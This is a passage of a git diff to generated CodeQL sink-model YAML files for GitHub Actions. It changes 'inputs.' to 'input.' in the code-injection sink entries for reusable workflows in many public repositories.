924f5eb157c9..d0fe6b0eff5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 1244f76cbf1f..3d3a4de2946a 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 94c6c81d33ec..4c58af6969dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c5f5fc4b29d7..8629f279891a 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 506dd2b9fee2..4a6bbd77ec97 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 4a81c585259a..c22998ee52a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", "code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index d62c86e1129e..c74922e61dc0 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 8aedf9000a06..169094c3eb38 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index b14f14538b81..6e4e4f4f1e90 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index 3129cac8979c..dbc26ef9f04f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index a23f69909c7e..c69de7cfcc26 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index cd91f58c7ec7..685b0b144c9d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index d8be4cc11b91..9e3fc5cdc4f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index ad0943c30408..4cd6cd8f591a 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] - - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e8c98ab4576a..01726410e185 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 00b45b50f887..90e61bcf11a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index a5f35f3b7379..b4e1ff8155a3 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index d05595196275..3621105b74e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index ec7b51abd8e3..b6660df1c9b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 92fd43bda752..ead0bcfab169 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index ca550e4ddd76..6f9a12e90698 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 580ac8bef0b5..8ac32e4a7b7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 463536e9693d..3c21fcad386c 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 57bf30dc0cc1..e0d2508932fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index b7e49d46e1c0..96830183506a 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 89257a02fcd2..7f9299eb4d39 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index a645511766be..7a79d4c1e092 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git 